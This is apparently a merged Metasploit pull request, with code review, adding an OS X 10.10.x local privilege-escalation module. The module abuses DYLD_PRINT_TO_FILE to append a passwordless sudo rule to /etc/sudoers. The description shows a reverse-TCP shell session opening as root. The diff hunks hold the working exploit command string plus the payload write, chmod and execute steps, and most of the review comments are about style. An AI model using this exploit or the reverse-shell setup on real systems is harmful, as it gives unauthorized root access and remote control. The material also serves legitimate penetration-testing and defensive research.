### PR TITLE
OSX 10.10.4 DYLD_PRINT_TO_FILE local root exploit

### PR DESCRIPTION
**Pull request by joevennix**
### Verification
- [x] Get a session on osx 10.10.4
- [x] Configure the module, get root
  
  ```
  msf exploit(dlyd_print_to_file_root) > set payload osx/x64/shell_reverse_tcp
  payload => osx/x64/shell_reverse_tcp
  msf exploit(dlyd_print_to_file_root) > set LHOST 192.168.1.2
  LHOST => 192.168.1.2
  msf exploit(dlyd_print_to_file_root) > set LPORT 5555
  LPORT => 5555
  msf exploit(dlyd_print_to_file_root) > set SESSION 1
  SESSION => 1
  msf exploit(dlyd_print_to_file_root) > run
  [*] Started reverse handler on 192.168.1.2:8882
  [*] Writing payload to `/.Trashes/imVacrjS'
  [*] Executing exploit...
  [*] Command shell session 6 opened (192.168.1.2:8882 -> 192.168.1.2:51252) at 2015-07-21 21:48:42 -0500
  [+] Deleted /.Trashes/imVacrjS
  
  3448771354
  JmKHsQtsilGBwNXXTcKgGovWTmRSmLwj
  uQcsIiHfAUikQobTGujIdlHDbowXIKpI
  whoami
  root
  ^Z
  ```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Grabbing, since I was too slow to write this. :)

**Comment by todb-r7** [comment]
Retitling for clarity, about to steal this from @wvu-r7 because it's getting some press heat and would like to land it before writing the weekly blog post, so I can talk about it.

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb [hunk 1]
```diff
@@ -0,0 +1,84 @@
...
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
+    )
+  end
+
+  def sploit
+    "/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
```
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: @todb-r7 and I are changing this to ```%q```.

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb [hunk 2]
```diff
@@ -0,0 +1,84 @@
...
+      }
+    ))
+
+    register_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def exploit
+    print_status("Writing payload to `#{payload_file}'")
```
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: @todb-r7: Can you drop the Unix/LaTeX-style quotes from this or add them to line 57?

**Comment by wvu-r7** [comment]
@todb-r7 noticed that it should be ```dyld_print_to_file_root``` instead of ```dlyd_print_to_file_root```.

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb [hunk 3]
```diff
@@ -0,0 +1,84 @@
...
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
+      'Description'    => %q{
+        In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
```
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: @todb-r7 is updating the description.

**Comment by wvu-r7** [comment]
All good from me. :)

**Comment by todb-r7** [comment]
Ok, see joevennix#2

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb [hunk 4]
```diff
@@ -0,0 +1,84 @@
...
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+    cmd_exec("chmod +x #{payload_file}")
+
+    print_status("Executing exploit at #{payload_file}...")
+    cmd_exec(sploit)
+  end
+
+  def check
+    (ver?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
```
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: https://github.com/rapid7/metasploit-framework/pull/5665#discussion_r34113129 for later when we can fix 'em all.

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: Correction: ```%Q```.

Comment (todb-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: Oh, good call.

File: modules/exploits/osx/local/dlyd_print_to_file_root.rb (hunk 4 above)
Comment (wvu-r7) [inline modules/exploits/osx/local/dlyd_print_to_file_root.rb]: And no parens around ```ver?```.

**Comment by wvu-r7** [comment]
That was some Inception-level merging.

**Comment by todb-r7** [comment]
yay thanks @wvu-r7 and @joevennix!

**Comment by wvu-r7** [comment]
Thanks to @bcook-r7 for testing!

**Pull request merged**